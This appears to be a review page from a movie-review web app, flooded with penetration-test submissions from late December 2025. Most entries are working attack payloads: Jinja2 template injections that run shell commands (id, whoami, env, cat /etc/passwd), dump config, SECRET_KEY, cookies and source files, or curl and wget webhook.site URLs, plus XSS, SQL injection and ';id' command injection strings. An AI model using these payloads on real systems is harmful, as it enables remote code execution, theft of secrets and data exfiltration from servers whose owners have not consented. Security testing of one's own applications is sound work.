testuser (Dec 31, 2025 08:38 AM)
-
<script>alert('XSS')</script> (Dec 31, 2025 08:37 AM)
test
-
<iframe src=javascript:alert('XSS')> (Dec 31, 2025 08:37 AM)
test
-
<svg onload=alert('XSS')> (Dec 31, 2025 08:37 AM)
test
-
<img src=x onerror=alert('XSS')> (Dec 31, 2025 08:37 AM)
test
-
<script>alert('XSS')</script> (Dec 31, 2025 08:37 AM)
test
-
{{__import__('requests').get('https://webhook.site/3d3ab115-015c-405b-9913-5a1695cc145b?source=add_review')}} (Dec 31, 2025 08:36 AM)
test
-
{{__import__('requests').get('https://webhook.site/fa830b7d-a33d-43ae-82af-72c317adbe85?test=1')}} (Dec 31, 2025 08:35 AM)
test
-
{{__import__('urllib.request').urlopen('https://webhook.site/fa830b7d-a33d-43ae-82af-72c317adbe85')}} (Dec 31, 2025 08:35 AM)
test
-
{{__import__('requests').get('https://webhook.site/fa830b7d-a33d-43ae-82af-72c317adbe85')}} (Dec 31, 2025 08:35 AM)
test
-
{{''.__class__.__mro__[1].__subclasses__()[396]('wget https://webhook.site/fa830b7d-a33d-43ae-82af-72c317adbe85',shell=True)}} (Dec 31, 2025 08:35 AM)
test
-
{{''.__class__.__mro__[1].__subclasses__()[396]('curl https://webhook.site/fa830b7d-a33d-43ae-82af-72c317adbe85',shell=True)}} (Dec 31, 2025 08:35 AM)
test
-
testuser (Dec 31, 2025 08:34 AM)
TEST_<%= 7*7 %>_TEST
-
TEST_<#assign x=7*7>${x}_TEST (Dec 31, 2025 08:34 AM)
UNIQUE_CONTENT_MARKER_3
-
TEST_<%= 7*7 %>_TEST (Dec 31, 2025 08:34 AM)
UNIQUE_CONTENT_MARKER_2
-
TEST_{{"test"}}_TEST (Dec 31, 2025 08:34 AM)
UNIQUE_CONTENT_MARKER
- {{config.__class__.__init__.__globals__['os'].popen('id').read()}} (Dec 31, 2025 08:34 AM)
- {{''.__class__.__mro__[1].__subclasses__()[396]('id',shell=True)}} (Dec 31, 2025 08:34 AM)
- {{''.__class__}} (Dec 31, 2025 08:34 AM)
-
{{7*7}} (Dec 31, 2025 08:34 AM)
test
- {{config}} (Dec 31, 2025 08:34 AM)
-
{{__import__('requests').get('http://example.com')}} (Dec 31, 2025 08:34 AM)
test
-
{{''.__class__.__mro__[1].__subclasses__()[396]('curl http://example.com',shell=True)}} (Dec 31, 2025 08:34 AM)
test
- {{'hello'+'world'}} (Dec 31, 2025 08:34 AM)
-
TEST_<#assign x=7*7>${x}_TEST (Dec 31, 2025 08:34 AM)
test
- {{4*'y'}} (Dec 31, 2025 08:34 AM)
-
TEST_#set($x=7*7)$x_TEST (Dec 31, 2025 08:34 AM)
test
-
TEST_{{#if true}}yes{{/if}}_TEST (Dec 31, 2025 08:34 AM)
test
- {{8*8}} (Dec 31, 2025 08:34 AM)
-
TEST_<%= 7*7 %>_TEST (Dec 31, 2025 08:34 AM)
test
-
TEST_${7*7}_TEST (Dec 31, 2025 08:34 AM)
test
- {{7*7}} (Dec 31, 2025 08:34 AM)
-
TEST_{{[1,2,3]}}_TEST (Dec 31, 2025 08:34 AM)
test
-
TEST_{{"test"}}_TEST (Dec 31, 2025 08:34 AM)
test
-
TEST_{{7*7}}_TEST (Dec 31, 2025 08:34 AM)
test
-
UNIQUE_MARKER_{{7*7}}_END (Dec 31, 2025 08:33 AM)
CONTENT_MARKER_{{7*7}}_END
-
{{7*7}} (Dec 31, 2025 08:33 AM)
test
- {{cycler.__globals__.__builtins__.__import__('os').popen('id').read()}} (Dec 31, 2025 08:33 AM)
- {{lipsum.__globals__.__builtins__.__import__('os').popen('id').read()}} (Dec 31, 2025 08:33 AM)
- {{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}} (Dec 31, 2025 08:33 AM)
- {{config.__class__.__init__.__globals__['os'].popen('id').read()}} (Dec 31, 2025 08:33 AM)
- {{''.__class__.__mro__[1].__subclasses__()[396]('id',shell=True)}} (Dec 31, 2025 08:33 AM)
-
testuser (Dec 31, 2025 08:33 AM)
test
-
testuser (Dec 31, 2025 08:33 AM)
test
-
testuser (Dec 31, 2025 08:33 AM)
test
-
testuser (Dec 31, 2025 08:33 AM)
test
-
{{7*7}} (Dec 31, 2025 08:33 AM)
test
-
testuser (Dec 31, 2025 08:33 AM)
test
-
test (Dec 31, 2025 08:32 AM)
{{7*7}}
- {{7*7}} (Dec 31, 2025 08:32 AM)
-
testuser (Dec 31, 2025 08:32 AM)
CONTENT_{{999*999}}_CONTENT
-
{{undefined_variable}} (Dec 31, 2025 08:32 AM)
test
-
UNIQUE_{{range(5)}}_UNIQUE (Dec 31, 2025 08:32 AM)
test
-
UNIQUE_{{1+1+1+1+1}}_UNIQUE (Dec 31, 2025 08:32 AM)
test
-
UNIQUE_{{999*999}}_UNIQUE (Dec 31, 2025 08:32 AM)
test
-
BEFORE_{{4*4}}_AFTER (Dec 31, 2025 08:32 AM)
test
- {{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}} (Dec 31, 2025 08:32 AM)
-
TEST_UNIQUE_ID_{{7*7}} (Dec 31, 2025 08:32 AM)
test
-
MARKER_START_{{7*7}}_MARKER_END (Dec 31, 2025 08:32 AM)
test
-
SSTI_TEST_{{7*7}}_END (Dec 31, 2025 08:32 AM)
test
-
{{config}} (Dec 31, 2025 08:32 AM)
test
-
{{request.environ['PATH']}} (Dec 31, 2025 08:32 AM)
test
-
{{open('/etc/passwd').read()}} (Dec 31, 2025 08:32 AM)
test
-
{{7*7}} (Dec 31, 2025 08:32 AM)
test
- {{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}} (Dec 31, 2025 08:32 AM)
-
testuser (Dec 31, 2025 08:32 AM)
{{8*8}}
- {{7*7}} (Dec 31, 2025 08:32 AM)
-
{{request.environ['PATH']}} (Dec 31, 2025 08:31 AM)
test
-
{{request.environ.keys()}} (Dec 31, 2025 08:31 AM)
test
-
{{request.environ}} (Dec 31, 2025 08:31 AM)
test
-
{{open('/app/app.py').read()}} (Dec 31, 2025 08:31 AM)
test
-
{{open('/app/config.py').read()}} (Dec 31, 2025 08:31 AM)
test
-
{{open('/etc/passwd').read()}} (Dec 31, 2025 08:31 AM)
test
-
{{__import__('subprocess').call(['id'])}} (Dec 31, 2025 08:31 AM)
test
-
{{__import__('os').system('id')}} (Dec 31, 2025 08:31 AM)
test
-
{{exec('import os; os.system("id")')}} (Dec 31, 2025 08:31 AM)
test
-
{{eval('1+1')}} (Dec 31, 2025 08:31 AM)
test
-
{{''.__class__.__mro__[1].__subclasses__()[396]('id',shell=True)}} (Dec 31, 2025 08:31 AM)
test
-
{{''.__class__.__mro__[1].__subclasses__()[413]('os').system('id')}} (Dec 31, 2025 08:31 AM)
test
-
testuser (Dec 31, 2025 08:31 AM)
{{7*7}}
-
{{7*7}} (Dec 31, 2025 08:31 AM)
test
-
{{''.__class__.__mro__[1].__subclasses__()[413]('os').system('id')}} (Dec 31, 2025 08:30 AM)
test
-
{{''.__class__.__mro__[1].__subclasses__()[396]('whoami',shell=True)}} (Dec 31, 2025 08:30 AM)
test
-
{{''.__class__.__mro__[1].__subclasses__()[396]('id',shell=True)}} (Dec 31, 2025 08:30 AM)
test
-
${7*7} (Dec 31, 2025 08:30 AM)
test
-
{{#if (eq 7 7)}}true{{/if}} (Dec 31, 2025 08:30 AM)
test
-
{{self}} (Dec 31, 2025 08:30 AM)
test
-
{{''.__class__.__mro__[1].__subclasses__()[396]}} (Dec 31, 2025 08:30 AM)
test
-
{{config}} (Dec 31, 2025 08:30 AM)
test
-
{{7*7}} (Dec 31, 2025 08:30 AM)
test
-
{{''.__class__}} (Dec 31, 2025 08:30 AM)
test review
-
{{config}} (Dec 31, 2025 08:30 AM)
test review
-
{{7*7}} (Dec 31, 2025 08:30 AM)
test review
- {{config}} (Dec 31, 2025 08:30 AM)
- {{'hello'+'world'}} (Dec 31, 2025 08:30 AM)
- {{7*7}} (Dec 31, 2025 08:29 AM)
-
{{7*7}} (Dec 31, 2025 08:29 AM)
Test review
-
{{open('/etc/passwd').read()}} (Dec 31, 2025 08:29 AM)
Test
-
{{config}} (Dec 31, 2025 08:29 AM)
Test
-
{{7*7}} (Dec 31, 2025 08:29 AM)
Test review with {{config}}
-
testuser (Dec 31, 2025 08:28 AM)
{{7*7}}
-
{{7*7}} (Dec 31, 2025 08:28 AM)
Test review
-
{{request.application.__globals__.__builtins__.__import__('os').popen('pwd').read()}} (Dec 30, 2025 06:47 PM)
RCE test 3
-
{{lipsum.__globals__['os'].popen('whoami').read()}} (Dec 30, 2025 06:47 PM)
RCE test 2
-
{{config.__class__.__init__.__globals__['os'].popen('id').read()}} (Dec 30, 2025 06:47 PM)
RCE test 1
-
{{''.__class__}} (Dec 30, 2025 06:46 PM)
Test review 3
-
{{config}} (Dec 30, 2025 06:46 PM)
Test review 2
-
{{7*7}} (Dec 30, 2025 06:46 PM)
Test review 1
-
TestUser (Dec 30, 2025 06:45 PM)
This is a test review
-
Rating Tester (Dec 30, 2025 06:16 PM)
Testing rating field
-
Tester_SSTI_TEST_1767117901 (Dec 30, 2025 06:05 PM)
{{7*'7'}}
-
{{7*7}} (Dec 30, 2025 06:04 PM)
Test review SSTI_TEST_1767117899
-
RCE_Tester (Dec 30, 2025 06:02 PM)
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
-
RCE_Tester (Dec 30, 2025 06:02 PM)
{{joiner.__init__.__globals__.os.popen('id').read()}}
-
RCE_Tester (Dec 30, 2025 06:02 PM)
{{cycler.__init__.__globals__.os.popen('id').read()}}
-
RCE_Tester (Dec 30, 2025 06:02 PM)
{{lipsum.__globals__['os'].popen('id').read()}}
-
RCE_Tester (Dec 30, 2025 06:02 PM)
{{''.__class__.__mro__[1].__subclasses__()[104].__init__.__globals__['sys'].modules['os'].popen('cat /etc/hostname').read()}}
-
RCE_Tester (Dec 30, 2025 06:02 PM)
{{config.__class__.__init__.__globals__['os'].popen('whoami').read()}}
-
RCE_Tester (Dec 30, 2025 06:02 PM)
{{''.__class__.__mro__[1].__subclasses__()[104].__init__.__globals__['sys'].modules['os'].popen('id').read()}}
-
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}} (Dec 30, 2025 06:02 PM)
RCE test review
-
{{joiner.__init__.__globals__.os.popen('id').read()}} (Dec 30, 2025 06:02 PM)
RCE test review
-
{{cycler.__init__.__globals__.os.popen('id').read()}} (Dec 30, 2025 06:02 PM)
RCE test review
-
{{lipsum.__globals__['os'].popen('id').read()}} (Dec 30, 2025 06:02 PM)
RCE test review
-
{{''.__class__.__mro__[1].__subclasses__()[104].__init__.__globals__['sys'].modules['os'].popen('cat /etc/hostname').read()}} (Dec 30, 2025 06:02 PM)
RCE test review
-
{{config.__class__.__init__.__globals__['os'].popen('whoami').read()}} (Dec 30, 2025 06:02 PM)
RCE test review
-
{{''.__class__.__mro__[1].__subclasses__()[104].__init__.__globals__['sys'].modules['os'].popen('id').read()}} (Dec 30, 2025 06:02 PM)
RCE test review
-
{{request}} (Dec 30, 2025 06:02 PM)
Test review for Request Object
-
{{config}} (Dec 30, 2025 06:02 PM)
Test review for Config Access
-
{{'SSTI'+'TEST'}} (Dec 30, 2025 06:02 PM)
Test review for String Concatenation
-
{{7*'7'}} (Dec 30, 2025 06:02 PM)
Test review for String Multiplication
-
{{7*7}} (Dec 30, 2025 06:02 PM)
Test review for Math Operation
-
SSTI_Tester (Dec 30, 2025 06:01 PM)
{{''.__class__}}
-
SSTI_Tester (Dec 30, 2025 06:01 PM)
{{request}}
-
SSTI_Tester (Dec 30, 2025 06:01 PM)
{{config}}
-
SSTI_Tester (Dec 30, 2025 06:01 PM)
{{'SSTI_TEST'}}
-
SSTI_Tester (Dec 30, 2025 06:01 PM)
{{7*'7'}}
-
SSTI_Tester (Dec 30, 2025 06:01 PM)
{{7*7}}
-
{{''.__class__}} (Dec 30, 2025 06:01 PM)
This is a test review for SSTI testing.
-
{{request}} (Dec 30, 2025 06:01 PM)
This is a test review for SSTI testing.
-
{{config}} (Dec 30, 2025 06:01 PM)
This is a test review for SSTI testing.
-
{{'SSTI_TEST'}} (Dec 30, 2025 06:01 PM)
This is a test review for SSTI testing.
-
{{7*'7'}} (Dec 30, 2025 06:01 PM)
This is a test review for SSTI testing.
-
{{7*7}} (Dec 30, 2025 06:01 PM)
This is a test review for SSTI testing.
-
TestUser_Baseline (Dec 30, 2025 06:01 PM)
This is a baseline test review to understand normal behavior.
-
test_recon (Dec 30, 2025 05:50 PM)
Test review for recon
-
rce_review (Dec 30, 2025 03:42 PM)
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
-
{{15*15}} (Dec 30, 2025 03:41 PM)
Testing username parameter
-
review_test_4 (Dec 30, 2025 03:38 PM)
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
-
review_test_3 (Dec 30, 2025 03:38 PM)
{{config.items()}}
-
review_test_2 (Dec 30, 2025 03:38 PM)
{{'REVIEW_SSTI'.upper()}}
-
review_test_1 (Dec 30, 2025 03:38 PM)
{{9*'9'}}
-
review_test_0 (Dec 30, 2025 03:38 PM)
{{8*8}}
-
ssti_test_user_content3 (Dec 30, 2025 03:29 PM)
String test: {{'test'+'ing'}} should be testing
-
ssti_test_user_content2 (Dec 30, 2025 03:29 PM)
SSTI Test: {{7*'7'}} should be 7777777
-
ssti_test_user_content1 (Dec 30, 2025 03:29 PM)
SSTI Test Content: {{7*7}} - should evaluate to 49 if vulnerable
-
reviewer_1767108511_2 (Dec 30, 2025 03:28 PM)
REVIEW_TEST_1767108511_{{7*'7'}}
-
reviewer_1767108511_1 (Dec 30, 2025 03:28 PM)
REVIEW_TEST_1767108511_{{7*7}}
-
{{7*'7'}} (Dec 30, 2025 03:27 PM)
Testing SSTI in username field - payload 2
-
{{7*7}} (Dec 30, 2025 03:27 PM)
Testing SSTI in username field - payload 1
-
baseline_user_test (Dec 30, 2025 03:27 PM)
This is a baseline review for testing purposes.
-
testuser_filter (Dec 30, 2025 03:23 PM)
{{7|int*7|int}}
-
testuser_unicode (Dec 30, 2025 03:23 PM)
{{7*7}}
-
testuser_class (Dec 30, 2025 03:23 PM)
{{''|attr('__class__')}}
-
testuser_request (Dec 30, 2025 03:23 PM)
{{request|attr('application')}}
-
testuser_config (Dec 30, 2025 03:23 PM)
{{config|safe}}
-
testuser_block (Dec 30, 2025 03:23 PM)
{% if 7*7 %}49{% endif %}
-
testuser_safe (Dec 30, 2025 03:23 PM)
{{7*7|safe}}
-
testuser_math (Dec 30, 2025 03:23 PM)
{{7*7}}
-
TestUser (Dec 30, 2025 03:20 PM)
{{7*7}}
- <!--#echo var='DATE_LOCAL' --> (Dec 30, 2025 03:17 PM)
- test_jinja_check (Dec 30, 2025 03:16 PM)
- MARKER_XYZ_999_{{7*'7'}} (Dec 30, 2025 03:16 PM)
- UNIQUE_TEST_12345_{{7*7}} (Dec 30, 2025 03:16 PM)
- testuser (Dec 30, 2025 03:16 PM)
- {{config}} (Dec 30, 2025 03:16 PM)
- {{7*'7'}} (Dec 30, 2025 03:16 PM)
- {{7*7}} (Dec 30, 2025 03:16 PM)
- ssti_test_user (Dec 30, 2025 03:15 PM)
- testuser (Dec 30, 2025 03:15 PM)
- testuser (Dec 30, 2025 03:15 PM)
- testuser (Dec 30, 2025 03:15 PM)
- {{request}} (Dec 30, 2025 03:15 PM)
- {{''.__class__}} (Dec 30, 2025 03:15 PM)
- {{config.SECRET_KEY}} (Dec 30, 2025 03:15 PM)
- {{config}} (Dec 30, 2025 03:15 PM)
- {{7*'7'}} (Dec 30, 2025 03:15 PM)
- {{7*7}} (Dec 30, 2025 03:15 PM)
- testuser (Dec 30, 2025 03:15 PM)
- testuser (Dec 30, 2025 03:15 PM)
- {{config.items()}} (Dec 30, 2025 03:15 PM)
- {{7*7}} (Dec 30, 2025 03:14 PM)
- {{''.__class__.__mro__}} (Dec 30, 2025 03:14 PM)
- {{config.items()}} (Dec 30, 2025 03:14 PM)
- {{7*7}} (Dec 30, 2025 03:13 PM)
- testuser (Dec 30, 2025 03:13 PM)
-
TestUser_RCE_5 (Dec 30, 2025 03:12 PM)
Env Test: {{ request.application.__globals__.__builtins__.__import__('os').popen('env | head -10').read() }}
-
TestUser_RCE_4 (Dec 30, 2025 03:12 PM)
File Read Test: {{ request.application.__globals__.__builtins__.__import__('os').popen('cat /etc/passwd | head -5').read() }}
-
TestUser_RCE_3 (Dec 30, 2025 03:12 PM)
RCE Test 3: {{ request.application.__globals__.__builtins__.__import__('os').popen('pwd').read() }}
-
TestUser_RCE_2 (Dec 30, 2025 03:12 PM)
RCE Test 2: {{ config.__class__.__init__.__globals__['os'].popen('whoami').read() }}
-
TestUser_RCE_1 (Dec 30, 2025 03:12 PM)
RCE Test 1: {{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}
-
TestUser_SSTI_Alt (Dec 30, 2025 03:11 PM)
Alternative SSTI test: {{7*'7'}} should evaluate to 7777777 if Jinja2
-
TestUser_SSTI_Detection (Dec 30, 2025 03:11 PM)
Review content with SSTI test: {{7*7}} should evaluate to 49 if vulnerable
-
TestUser_Baseline (Dec 30, 2025 03:11 PM)
This is a normal review without any special characters.
-
final_test (Dec 30, 2025 03:06 PM)
UNIQUE_n9ocyg48d6yj_{{7*7}}_END
-
verify_test (Dec 30, 2025 03:05 PM)
{{7+7}}
-
verify_test (Dec 30, 2025 03:05 PM)
{{7*7}}
-
config_test (Dec 30, 2025 03:04 PM)
{{config}}
-
info_test (Dec 30, 2025 03:04 PM)
{{config.APPLICATION_ROOT}}
-
info_test (Dec 30, 2025 03:04 PM)
{{self}}
-
info_test (Dec 30, 2025 03:04 PM)
{{session}}
-
info_test (Dec 30, 2025 03:04 PM)
{{request.cookies}}
-
info_test (Dec 30, 2025 03:04 PM)
{{request.headers}}
-
info_test (Dec 30, 2025 03:04 PM)
{{request.url}}
-
info_test (Dec 30, 2025 03:04 PM)
{{request}}
-
info_test (Dec 30, 2025 03:04 PM)
{{config.DEBUG}}
-
info_test (Dec 30, 2025 03:04 PM)
{{config.SECRET_KEY}}
-
info_test (Dec 30, 2025 03:04 PM)
{{config}}
-
info_gather (Dec 30, 2025 03:03 PM)
{{config.__class__.__init__.__globals__['os'].popen('env | head -10').read()}}
-
info_gather (Dec 30, 2025 03:03 PM)
{{config.__class__.__init__.__globals__['os'].popen('python3 --version').read()}}
-
info_gather (Dec 30, 2025 03:03 PM)
{{config.__class__.__init__.__globals__['os'].popen('uname -a').read()}}
-
info_gather (Dec 30, 2025 03:03 PM)
{{config.__class__.__init__.__globals__['os'].popen('pwd').read()}}
-
info_gather (Dec 30, 2025 03:03 PM)
{{config.__class__.__init__.__globals__['os'].popen('whoami').read()}}
-
rce_test (Dec 30, 2025 03:03 PM)
{{namespace.__init__.__globals__.os.popen('cat /etc/passwd').read()}}
-
rce_test (Dec 30, 2025 03:03 PM)
{{joiner.__init__.__globals__.os.popen('ls /').read()}}
-
rce_test (Dec 30, 2025 03:03 PM)
{{cycler.__init__.__globals__.os.popen('hostname').read()}}
-
rce_test (Dec 30, 2025 03:03 PM)
{{lipsum.__globals__.__builtins__.__import__('os').popen('uname -a').read()}}
-
rce_test (Dec 30, 2025 03:03 PM)
{{request.application.__globals__.__builtins__.__import__('os').popen('pwd').read()}}
-
rce_test (Dec 30, 2025 03:03 PM)
{{''.__class__.__mro__[1].__subclasses__()[396]('id',shell=True,stdout=-1).communicate()[0].strip()}}
-
rce_test (Dec 30, 2025 03:03 PM)
{{config.__class__.__init__.__globals__['os'].popen('whoami').read()}}
-
testuser (Dec 30, 2025 03:02 PM)
{{request.application.__globals__.__builtins__.__import__('os').popen('curl https://webhook.site/a248bfe8-55cc-440b-8ccb-65227b65dfce').read()}}
-
{{request.application.__globals__.__builtins__.__import__('os').popen('curl https://webhook.site/a248bfe8-55cc-440b-8ccb-65227b65dfce').read()}} (Dec 30, 2025 03:02 PM)
Test review
-
SSTI_TEST_MARKER_12345 (Dec 30, 2025 03:02 PM)
Test review to check immediate rendering
-
testuser (Dec 30, 2025 03:02 PM)
{{request}}
-
testuser (Dec 30, 2025 03:02 PM)
{{self}}
-
testuser (Dec 30, 2025 03:02 PM)
{{config}}
-
testuser (Dec 30, 2025 03:02 PM)
{{7*7}}
-
{{request}} (Dec 30, 2025 03:02 PM)
Test review content
-
{{self}} (Dec 30, 2025 03:02 PM)
Test review content
-
{{config}} (Dec 30, 2025 03:02 PM)
Test review content
-
{{7*7}} (Dec 30, 2025 03:02 PM)
Test review content
-
test (Dec 30, 2025 02:58 PM)
test review
-
{{config.SECRET_KEY}} (Dec 30, 2025 08:52 AM)
Secret key exposure test
-
{{config.__class__.__init__.__globals__['os'].popen('pwd').read()}} (Dec 30, 2025 08:52 AM)
Current directory test
-
RCE_Test_User (Dec 30, 2025 08:52 AM)
{{config.__class__.__init__.__globals__['os'].popen('id').read()}}
-
{{config.__class__.__init__.__globals__['os'].popen('whoami').read()}} (Dec 30, 2025 08:52 AM)
RCE test - whoami command
-
ConfigTest (Dec 30, 2025 08:52 AM)
{{config}}
-
NormalUser (Dec 30, 2025 08:52 AM)
{{9*9}}
-
{{'ADMIN'+'SSTI'}} (Dec 30, 2025 08:52 AM)
String concatenation test
-
{{8*8}} (Dec 30, 2025 08:52 AM)
Another SSTI test
-
{{7*7}} (Dec 30, 2025 08:51 AM)
Test review for SSTI detection
-
user_1767083630 (Dec 30, 2025 08:33 AM)
{{lipsum.__globals__['os'].popen('pwd').read()}}_content_1767083630
-
user_1767083629 (Dec 30, 2025 08:33 AM)
{{7*7}}_content_1767083629
-
{{lipsum.__globals__['os'].popen('whoami').read()}}_rce_1767083622 (Dec 30, 2025 08:33 AM)
Test review 1767083622
-
{{lipsum.__globals__['os'].popen('id').read()}}_rce_1767083621 (Dec 30, 2025 08:33 AM)
Test review 1767083621
-
{{config}}_review_1767083620 (Dec 30, 2025 08:33 AM)
Test review 1767083620
-
{{7*7}}_review_1767083619 (Dec 30, 2025 08:33 AM)
Test review 1767083619
-
rating_test_1767083606 (Dec 30, 2025 08:33 AM)
Testing rating field
-
normal_user_1767083605 (Dec 30, 2025 08:33 AM)
This movie deserves {{7*7}} stars out of 10!
-
{{7*7}}_ssti_test_1767083605 (Dec 30, 2025 08:33 AM)
Testing review
-
test_user_baseline (Dec 30, 2025 08:33 AM)
Great movie!
-
testuser (Dec 30, 2025 08:33 AM)
{{"SSTI_TEST_MARKER"}}
-
{{config.__class__.__init__.__globals__['os'].popen('whoami').read()}} (Dec 30, 2025 08:29 AM)
Test review 1767083395_7732
-
{{config}} (Dec 30, 2025 08:29 AM)
Test review 1767083392_4041
-
{{7*'7'}} (Dec 30, 2025 08:29 AM)
Test review 1767083388_6025
-
{{7*7}} (Dec 30, 2025 08:29 AM)
Test review 1767083385_4290
- anonymous (Dec 30, 2025 04:51 AM)
- anonymous (Dec 30, 2025 04:51 AM)
-
duplicate_tester (Dec 30, 2025 04:51 AM)
Duplicate review attempt 5
-
duplicate_tester (Dec 30, 2025 04:51 AM)
Duplicate review attempt 4
-
duplicate_tester (Dec 30, 2025 04:51 AM)
Duplicate review attempt 3
-
duplicate_tester (Dec 30, 2025 04:51 AM)
Duplicate review attempt 2
-
duplicate_tester (Dec 30, 2025 04:51 AM)
Duplicate review attempt 1
-
rating_tester (Dec 30, 2025 04:51 AM)
Testing XSS attempt in rating
-
rating_tester (Dec 30, 2025 04:51 AM)
Testing SQL injection attempt
-
rating_tester (Dec 30, 2025 04:51 AM)
Testing Empty string
-
rating_tester (Dec 30, 2025 04:51 AM)
Testing Null value
-
rating_tester (Dec 30, 2025 04:51 AM)
Testing Infinity value
-
rating_tester (Dec 30, 2025 04:51 AM)
Testing NaN value
-
rating_tester (Dec 30, 2025 04:51 AM)
Testing Scientific notation 1e10
-
rating_tester (Dec 30, 2025 04:51 AM)
Testing Decimal rating 5.9999
-
rating_tester (Dec 30, 2025 04:51 AM)
Testing Decimal rating 3.5
-
rating_tester (Dec 30, 2025 04:51 AM)
Testing Integer overflow (2^31)
-
rating_tester (Dec 30, 2025 04:51 AM)
Testing Overflow rating 999999
-
rating_tester (Dec 30, 2025 04:51 AM)
Testing Zero rating
-
rating_tester (Dec 30, 2025 04:51 AM)
Testing Large negative rating -999
-
rating_tester (Dec 30, 2025 04:51 AM)
Testing Negative rating -1
-
testuser1 (Dec 30, 2025 04:49 AM)
This is a test review for business logic testing
- ValidatorUser (Dec 30, 2025 02:31 AM)
- TestUser3 (Dec 30, 2025 02:23 AM)
- TestUser2 (Dec 30, 2025 02:22 AM)
-
TestUser1 (Dec 30, 2025 02:22 AM)
- TestUser0 (Dec 30, 2025 02:22 AM)
-
Michael Chen (Dec 30, 2025 01:53 AM)
Absolutely mind-blowing! Christopher Nolan has created a masterpiece that challenges our perception of reality. The visual effects are stunning, and the storyline keeps you engaged from start to finish. Leonardo DiCaprio delivers an outstanding performance. Highly recommended for anyone who enjoys thought-provoking cinema!
-
overflow_review_Extremely (Dec 24, 2025 05:49 PM)
Test review for overflow
-
overflow_review_Min 64-bit (Dec 24, 2025 05:49 PM)
Test review for overflow
-
overflow_review_Min 32-bit (Dec 24, 2025 05:49 PM)
Test review for overflow
-
overflow_review_Min 32-bit (Dec 24, 2025 05:49 PM)
Test review for overflow
-
overflow_review_Max 64-bit (Dec 24, 2025 05:49 PM)
Test review for overflow
-
overflow_review_Max 64-bit (Dec 24, 2025 05:49 PM)
Test review for overflow
-
overflow_review_Max 32-bit (Dec 24, 2025 05:49 PM)
Test review for overflow
-
overflow_review_Max 32-bit (Dec 24, 2025 05:49 PM)
Test review for overflow
- anonymous (Dec 24, 2025 05:48 PM)
- anonymous (Dec 24, 2025 05:48 PM)
-
;id (Dec 24, 2025 05:43 PM)
test
-
testuser (Dec 24, 2025 05:19 PM)
Test
-
testuser (Dec 24, 2025 05:19 PM)
Test
-
testuser (Dec 24, 2025 05:19 PM)
test' OR '1'='1
-
testuser (Dec 24, 2025 05:19 PM)
test'
-
test'-- (Dec 24, 2025 05:19 PM)
Test
-
test' (Dec 24, 2025 05:19 PM)
Test
-
testuser (Dec 24, 2025 05:18 PM)
Great movie!
- anonymous (Dec 24, 2025 05:13 PM)
- anonymous (Dec 24, 2025 05:13 PM)
- anonymous (Dec 24, 2025 05:13 PM)
- anonymous (Dec 24, 2025 05:11 PM)
- anonymous (Dec 24, 2025 05:11 PM)
- anonymous (Dec 24, 2025 05:10 PM)
- anonymous (Dec 24, 2025 05:10 PM)
- anonymous (Dec 24, 2025 05:10 PM)
- anonymous (Dec 24, 2025 05:10 PM)
- anonymous (Dec 24, 2025 05:10 PM)
-
race_reviewer (Dec 24, 2025 05:00 PM)
Race condition test review from thread 2
-
race_reviewer (Dec 24, 2025 05:00 PM)
Race condition test review from thread 8
-
race_reviewer (Dec 24, 2025 05:00 PM)
Race condition test review from thread 9
-
race_reviewer (Dec 24, 2025 05:00 PM)
Race condition test review from thread 5
-
race_reviewer (Dec 24, 2025 05:00 PM)
Race condition test review from thread 4
-
race_reviewer (Dec 24, 2025 05:00 PM)
Race condition test review from thread 13
-
race_reviewer (Dec 24, 2025 05:00 PM)
Race condition test review from thread 14
-
race_reviewer (Dec 24, 2025 05:00 PM)
Race condition test review from thread 6
-
race_reviewer (Dec 24, 2025 05:00 PM)
Race condition test review from thread 10
-
race_reviewer (Dec 24, 2025 05:00 PM)
Race condition test review from thread 11
-
race_reviewer (Dec 24, 2025 05:00 PM)
Race condition test review from thread 12
-
race_reviewer (Dec 24, 2025 05:00 PM)
Race condition test review from thread 7
-
race_reviewer (Dec 24, 2025 05:00 PM)
Race condition test review from thread 3
-
race_reviewer (Dec 24, 2025 05:00 PM)
Race condition test review from thread 0
-
race_reviewer (Dec 24, 2025 05:00 PM)
Race condition test review from thread 1
-
race_review_user (Dec 24, 2025 04:46 PM)
Race condition test review 1
-
race_review_user (Dec 24, 2025 04:46 PM)
Race condition test review 6
-
race_review_user (Dec 24, 2025 04:46 PM)
Race condition test review 0
-
race_review_user (Dec 24, 2025 04:46 PM)
Race condition test review 5
-
race_review_user (Dec 24, 2025 04:46 PM)
Race condition test review 9
-
race_review_user (Dec 24, 2025 04:46 PM)
Race condition test review 4
-
race_review_user (Dec 24, 2025 04:46 PM)
Race condition test review 8
-
race_review_user (Dec 24, 2025 04:46 PM)
Race condition test review 7
-
race_review_user (Dec 24, 2025 04:46 PM)
Race condition test review 2
-
race_review_user (Dec 24, 2025 04:46 PM)
Race condition test review 3
-
test (Dec 24, 2025 04:38 PM)
test
-
test (Dec 24, 2025 04:38 PM)
test
-
test (Dec 24, 2025 04:38 PM)
test
-
test (Dec 24, 2025 04:38 PM)
test
-
test (Dec 24, 2025 04:38 PM)
test
-
test (Dec 24, 2025 04:38 PM)
test
-
test (Dec 24, 2025 04:38 PM)
test
-
test (Dec 24, 2025 04:38 PM)
test
-
test (Dec 24, 2025 04:38 PM)
test
-
test (Dec 24, 2025 04:38 PM)
test
-
test (Dec 24, 2025 04:38 PM)
test
-
test (Dec 24, 2025 04:38 PM)
test
-
test (Dec 24, 2025 04:38 PM)
test
-
test (Dec 24, 2025 04:38 PM)
test
-
test (Dec 24, 2025 04:38 PM)
test
-
test (Dec 24, 2025 04:38 PM)
test
-
test (Dec 24, 2025 04:38 PM)
test
-
test (Dec 24, 2025 04:38 PM)
test
-
test (Dec 24, 2025 04:38 PM)
test
-
test (Dec 24, 2025 04:38 PM)
test
-
test (Dec 24, 2025 04:38 PM)
test
-
test (Dec 24, 2025 04:38 PM)
test
-
test (Dec 24, 2025 04:38 PM)
test
-
test (Dec 24, 2025 04:38 PM)
test
-
test (Dec 24, 2025 04:38 PM)
test
-
test (Dec 24, 2025 04:38 PM)
test
-
